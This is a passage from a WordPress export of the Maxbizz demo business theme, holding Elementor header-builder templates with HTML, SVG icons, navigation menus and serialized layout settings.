		<wp:meta_value><![CDATA[a:9:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:3;s:21:"typography_typography";i:2;s:22:"typography_line_height";i:1;s:5:"align";i:1;s:20:"typography_font_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:2:{s:7:"content";a:1:{s:19:"section_social_icon";a:4:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;s:7:"columns";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:8:{s:9:"icon_size";i:1;s:12:"icon_padding";i:1;s:12:"icon_spacing";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;s:20:"icon_secondary_color";i:1;s:18:"icon_primary_color";i:1;}s:20:"section_social_hover";a:1:{s:19:"hover_primary_color";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:8;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:13:"margin_tablet";i:2;s:13:"margin_mobile";i:2;}}s:5:"style";a:1:{s:14:"section_border";a:1:{s:12:"border_width";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:3;s:11:"header_size";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:4:{s:11:"title_color";i:3;s:21:"typography_typography";i:3;s:20:"typography_font_size";i:3;s:22:"typography_font_weight";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:3;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:2:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_text_style";a:5:{s:10:"text_color";i:2;s:16:"text_color_hover";i:2;s:11:"text_indent";i:2;s:26:"icon_typography_typography";i:2;s:25:"icon_typography_font_size";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:2:{s:6:"layout";i:2;s:3:"gap";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:2;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_border";i:1;s:12:"border_width";i:1;s:12:"border_color";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:2;s:14:"padding_mobile";i:1;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:4:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:2;}}}}s:27:"wp-widget-mc4wp_form_widget";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header 3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/ot_header_builders/header-3/</link>
		<pubDate>Fri, 24 Jul 2020 03:48:42 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=182</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz-business/">
					<img src="https://maxbizz.s3.amazonaws.com/images/03_White.svg" alt="Maxbizz Business">
				</a>			        
				<a href="tel:+1-800-456-478-23">
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 384"><path d="m343.59375 101.039062c-7.953125 3.847657-11.28125 13.417969-7.433594 21.367188 10.511719 21.714844 15.839844 45.121094 15.839844 69.59375 0 88.222656-71.777344 160-160 160s-160-71.777344-160-160 71.777344-160 160-160c36.558594 0 70.902344 11.9375 99.328125 34.519531 6.894531 5.503907 16.976563 4.351563 22.480469-2.566406 5.503906-6.914063 4.351562-16.984375-2.570313-22.480469-33.652343-26.746094-76-41.472656-119.238281-41.472656-105.863281 0-192 86.136719-192 192s86.136719 192 192 192 192-86.136719 192-192c0-29.335938-6.40625-57.449219-19.039062-83.527344-3.839844-7.96875-13.441407-11.289062-21.367188-7.433594zm0 0"></path><path d="m192 64c-8.832031 0-16 7.167969-16 16v112c0 8.832031 7.167969 16 16 16h80c8.832031 0 16-7.167969 16-16s-7.167969-16-16-16h-64v-96c0-8.832031-7.167969-16-16-16zm0 0"></path></svg>				
				<h6>
					Our Working Hours
				</h6>
								<p>Mon - Sat: 8.00 - 18.00</p>
						<nav id="site-navigation">			
				<ul id="primary-menu"><li id="menu-item-1874"><a href="http://wpdemo.archiwp.com/maxbizz-business/">Home</a></li>
<li id="menu-item-1433"><a href="#">Pages</a>
<ul>
	<li id="menu-item-1537"><a href="http://wpdemo.archiwp.com/maxbizz-business/about-us/">About Us</a></li>
	<li id="menu-item-1559"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/">Our Services 1</a></li>
	<li id="menu-item-1554"><a href="http://wpdemo.archiwp.com/maxbizz-business/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-1543"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-1544"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-team/">Our Team</a></li>
	<li id="menu-item-1545"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-1541"><a href="http://wpdemo.archiwp.com/maxbizz-business/elements/">Elements</a></li>
	<li id="menu-item-1546"><a href="http://wpdemo.archiwp.com/maxbizz-business/typography/">Typography</a></li>
	<li id="menu-item-1542"><a href="http://wpdemo.archiwp.com/maxbizz-business/faqs/">FAQs</a></li>
	<li id="menu-item-1538"><a href="http://wpdemo.archiwp.com/maxbizz-business/404-2/">404</a></li>
	<li id="menu-item-1539"><a href="http://wpdemo.archiwp.com/maxbizz-business/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1557"><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1560"><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1558"><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1556"><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1563"><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1555"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/">Services</a>
<ul>
	<li id="menu-item-1553"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1552"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1551"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1550"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1549"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1548"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-1547"><a href="http://wpdemo.archiwp.com/maxbizz-business/blog/">Blog</a>
<ul>
	<li id="menu-item-1561"><a href="http://wpdemo.archiwp.com/maxbizz-business/blog/">Blog List</a></li>
	<li id="menu-item-1562"><a href="http://wpdemo.archiwp.com/maxbizz-business/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-1540"><a href="http://wpdemo.archiwp.com/maxbizz-business/contacts/">Contacts</a></li>
</ul>			</nav>
					<a href="#" target="_blank" rel="noopener">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener">
						Pinterest-p
											</a>
					<a href="#" target="_blank" rel="noopener">
						Instagram
											</a>
				<!-- Form Search on Header -->
						<form role="search" method="get" action="http://wpdemo.archiwp.com/maxbizz-business/" >
    <label>Search for:
    <input type="search" placeholder="Search&hellip;" value="" name="s" /></label>
	<button type="submit"></button>
    </form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>182</wp:post_id>
		<wp:post_date><![CDATA[2020-07-24 03:48:42]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-24 03:48:42]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-3]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"15f82ce","elType":"section","settings":{"content_position":"middle","structure":"20","padding":{"unit":"px","top":"17","right":"0","bottom":"48","left":"0","isLinked":false},"background_background":"classic","background_color":"#282828","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"}},"elements":[{"id":"d78080f","elType":"column","settings":{"_column_size":50,"_inline_size":20},"elements":[{"id":"2b1b8bd","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03_White.svg","id":1933},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"d4b56e5","elType":"column","settings":{"_column_size":50,"_inline_size":80,"_ot_content_align":"horizontal","align":"flex-end"},"elements":[{"id":"cd56b26","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#A5A5A5","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"0","isLinked":false},"link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"},{"id":"3c30484","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":24,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#A5A5A5","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"60","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"74c4536","elType":"widget","settings":{"title_text":"Our Working Hours","description_text":"Mon - Sat: 8.00 - 18.00","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/symbol.svg","id":356},"library":"svg"},"title_color":"#A5A5A5","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"60","isLinked":false}},"elements":[],"widgetType":"icon-box"}],"isInner":false}],"isInner":false},{"id":"3346a7f","elType":"section","settings":{"content_width":{"unit":"px","size":1280,"sizes":[]},"background_background":"classic","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"margin":{"unit":"px","top":"-33","right":0,"bottom":"-40","left":0,"isLinked":false},"sticky_class":"is-fixed","offset_space":{"unit":"px","size":33,"sizes":[]},"sticky_background":"#FFFFFF"},"elements":[{"id":"7fae78a","elType":"column","settings":{"_column_size":100,"_inline_size":null,"content_position":"center","align":"flex-end","_ot_column_min_width":{"unit":"px","size":220,"sizes":[]},"_ot_content_align":"horizontal"},"elements":[{"id":"4d3a690","elType":"section","settings":{"layout":"full_width","structure":"20","background_background":"classic","background_color":"#FFFFFF","border_radius":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"padding":{"unit":"px","top":"0","right":"40","bottom":"0","left":"40","isLinked":false},"css_classes":"off-boxshadow"},"elements":[{"id":"911d327","elType":"column","settings":{"_column_size":50,"_inline_size":74.957999999999998408384271897375583648681640625,"_ot_content_align":"horizontal"},"elements":[{"id":"82c5870","elType":"widget","settings":{"nav_menu":"main-menu","text_hover_color":"#D92300","menu_typography_typography":"custom","menu_typography_font_family":"Raleway","menu_typography_font_weight":"700"},"elements":[],"widgetType":"imenu"}],"isInner":true},{"id":"e0ea046","elType":"column","settings":{"_column_size":50,"_inline_size":25.042000000000001591615728102624416351318359375,"align":"flex-end","_ot_content_align":"horizontal"},"elements":[{"id":"9e80548","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"#02010100","__globals__":{"item_icon_primary_color":""}},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-instagram","library":"fa-brands"},"link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)","_id":"e7140d6"}],"shape":"circle","align":"","icon_size":{"unit":"px","size":13,"sizes":[]},"icon_padding":{"unit":"em","size":0.5,"sizes":[]},"icon_spacing":{"unit":"px","size":8,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"#C9C9C9","_padding":{"unit":"px","top":"22","right":"0","bottom":"22","left":"0","isLinked":false},"icon_color":"custom","hover_primary_color":"#D92300","hover_border_color":"#D92300","icon_secondary_color":"#373737","hover_secondary_color":"#FFFFFF"},"elements":[],"widgetType":"social-icons"},{"id":"60be152","elType":"widget","settings":{"bg_btn":"#D92300","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"40","isLinked":false}},"elements":[],"widgetType":"isearch"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:7:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:5;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:5:{s:12:"_inline_size";i:5;s:17:"_ot_content_align";i:4;s:5:"align";i:3;s:16:"content_position";i:1;s:20:"_ot_column_min_width";i:1;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:8;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:1;}}s:5:"style";a:2:{s:18:"section_style_icon";a:3:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;}s:21:"section_style_content";a:12:{s:26:"content_vertical_alignment";i:3;s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:3;}}}}s:7:"section";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:6:"layout";a:3:{s:14:"section_layout";a:3:{s:16:"content_position";i:1;s:6:"layout";i:1;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}s:19:"header_custom_class";a:3:{s:12:"sticky_class";i:1;s:12:"offset_space";i:1;s:17:"sticky_background";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:7:"padding";i:2;s:11:"css_classes";i:1;s:6:"margin";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:3;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:26:"box_shadow_box_shadow_type";i:2;s:21:"box_shadow_box_shadow";i:3;s:13:"border_radius";i:1;}}}}s:5:"imenu";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:5:"style";a:1:{s:18:"style_menu_section";a:4:{s:16:"text_hover_color";i:1;s:26:"menu_typography_typography";i:1;s:27:"menu_typography_font_family";i:1;s:27:"menu_typography_font_weight";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:7;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:8:{s:9:"icon_size";i:1;s:12:"icon_padding";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;s:20:"icon_secondary_color";i:1;}s:20:"section_social_hover";a:3:{s:19:"hover_primary_color";i:1;s:18:"hover_border_color";i:1;s:21:"hover_secondary_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_form_section";a:1:{s:6:"bg_btn";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header 4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/ot_header_builders/header-4/</link>
		<pubDate>Fri, 24 Jul 2020 06:55:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=217</guid>
		<description></description>
		<content:encoded><![CDATA[<ul>
							<li>
													
										  Mon - Sat: 8.00 - 18.00
									</li>
								<li>
							

	
		
	

						
										411 University St, Seattle
									</li>
								<li>
					<a href="tel:+1-800-456-478-23">						
							

	
		
	

						
										+1-800-456-478-23
											</a>
									</li>
						</ul>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Instagram
											</a>
			<a href="#" role="button">
						FREE QUOTE
					</a>
				<a href="http://wpdemo.archiwp.com/maxbizz/">
					<img src="https://maxbizz.s3.amazonaws.com/images/04_Black.svg" alt="Maxbizz">
				</a>			        
						<nav id="site-navigation">			
				<ul id="primary-menu"><li id="menu-item-361"><a href="http://wpdemo.archiwp.com/maxbizz/">Home</a></li>
<li id="menu-item-363"><a href="#">Pages</a>
<ul>
	<li id="menu-item-368"><a href="#">About Us</a></li>
</ul>
</li>
<li id="menu-item-364"><a href="#">Portfolio</a></li>
<li id="menu-item-365"><a href="#">Blog</a></li>
<li id="menu-item-366"><a href="#">Shop</a></li>
<li id="menu-item-367"><a href="#">Contacts</a></li>
</ul>			</nav>
				<!-- Form Search on Header -->
						
    <label>Search for:
    </label>
	<button type="submit"></button>
    ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>217</wp:post_id>
		<wp:post_date><![CDATA[2020-07-24 06:55:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-24 06:55:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-4]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.4]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"2bd5f14","elType":"section","settings":{"content_position":"middle","structure":"21","background_background":"classic","background_color":"#0B2A41","margin":{"unit":"px","top":"","right":0,"bottom":"","left":0,"isLinked":true}},"elements":[{"id":"f191d30","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"6d41460","elType":"widget","settings":{"view":"inline","icon_list":[{"text":"  Mon - Sat: 8.00 - 18.00","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/symbol.svg","id":356},"library":"svg"},"_id":"e6e2d89"},{"text":"411 University St, 